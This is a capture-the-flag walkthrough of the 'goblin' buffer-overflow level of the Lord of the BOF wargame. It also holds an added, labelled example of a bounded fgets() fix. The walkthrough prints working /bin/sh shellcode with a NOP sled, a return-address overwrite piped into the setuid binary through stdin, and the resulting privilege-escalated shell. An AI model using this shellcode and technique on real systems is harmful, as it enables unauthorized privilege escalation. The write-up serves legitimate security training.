[BOF] cobolt -> goblin

방구석여포 2018. 2. 10. 23:27

This is the goblin level.

[cobolt@localhost cobolt]$ cat goblin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - goblin
        - small buffer + stdin
*/

#include <stdio.h>   /* added: declares gets() and printf() */

int main()
{
    char buffer[16];          /* 16-byte stack buffer */
    gets(buffer);             /* unbounded read from stdin: no length check, so
                                 anything past 16 bytes overwrites the saved
                                 ebp and the return address */
    printf("%s\n", buffer);
    return 0;
}


Compared with the cobolt level, the only change is the gets() call: input now comes from stdin instead of argv.
The shellcode is placed in an environment variable, and the overflow is delivered through stdin using the cat command.
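For contrast, here is the bounded replacement for that gets() call, shown beside a small harness that feeds it an over-long line. This is an added example, not code from the original post or from the Lord of the BOF game; the helper names read_line_bounded and stored_length are assumptions made for this example, and fmemopen (POSIX, glibc) is used only to push a constructed input string through a FILE* so the check runs offline.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not part of goblin.c): read one line into buf of size n.
 * fgets() stops at n-1 bytes, so the buffer can never be overrun. If the line
 * was longer than the buffer, the remainder is drained so it does not leak
 * into the next read. Returns the number of bytes stored, or -1 on EOF with
 * no data. */
int read_line_bounded(FILE *in, char *buf, size_t n) {
    if (n == 0) return -1;
    if (fgets(buf, (int)n, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* strip the newline, as gets() would */
    } else {
        int c;                      /* line was truncated: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return (int)len;
}

/* Hypothetical helper: run read_line_bounded() over a constructed input string
 * with a buffer of bufsize bytes (goblin uses 16) and report how many bytes
 * were actually stored. */
int stored_length(const char *text, size_t bufsize) {
    char buffer[64];
    if (bufsize > sizeof buffer) return -1;
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (in == NULL) return -1;
    int stored = read_line_bounded(in, buffer, bufsize);
    fclose(in);
    return stored;
}

/* Same program shape as goblin.c, with the unbounded read replaced. */
int main(void) {
    char buffer[16];
    int n = read_line_bounded(stdin, buffer, sizeof buffer);
    if (n >= 0)
        printf("%s\n", buffer);
    return 0;
}
```

With a constructed line of 40 'A' bytes and a 16-byte buffer, stored_length() returns 15: the buffer keeps 15 characters plus the terminator, and the remaining bytes never reach the stack. The drain loop matters in practice: without it, the leftover input would be returned by the next read instead of being dropped.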

[cobolt@localhost cobolt]$ export SH=$(python -c 'print "\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80"')


(gdb) set disassembly-flavor intel 
(gdb) disassemble main
Dump of assembler code for function main:
0x80483f8 <main>: push   %ebp
0x80483f9 <main+1>: mov    %ebp,%esp
0x80483fb <main+3>: sub    %esp,16
0x80483fe <main+6>: lea    %eax,[%ebp-16]
0x8048401 <main+9>: push   %eax
0x8048402 <main+10>: call   0x804830c <gets>
0x8048407 <main+15>: add    %esp,4
0x804840a <main+18>: lea    %eax,[%ebp-16]
0x804840d <main+21>: push   %eax
0x804840e <main+22>: push   0x8048470
0x8048413 <main+27>: call   0x804833c <printf>
0x8048418 <main+32>: add    %esp,8
0x804841b <main+35>: leave  
0x804841c <main+36>: ret    
0x804841d <main+37>: nop    
0x804841e <main+38>: nop    
0x804841f <main+39>: nop    
End of assembler dump.
(gdb) b *0x804841b
Breakpoint 1 at 0x804841b

I set a breakpoint just before the ret instruction.


[cobolt@localhost cobolt]$ $(python -c 'print "\x90"*20+"\x76\xdc\xff\xbf"' ; cat)|./goblin
߿¿
bash$ id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
bash$ my-pass
euid = 503
hackers proof
bash$ 

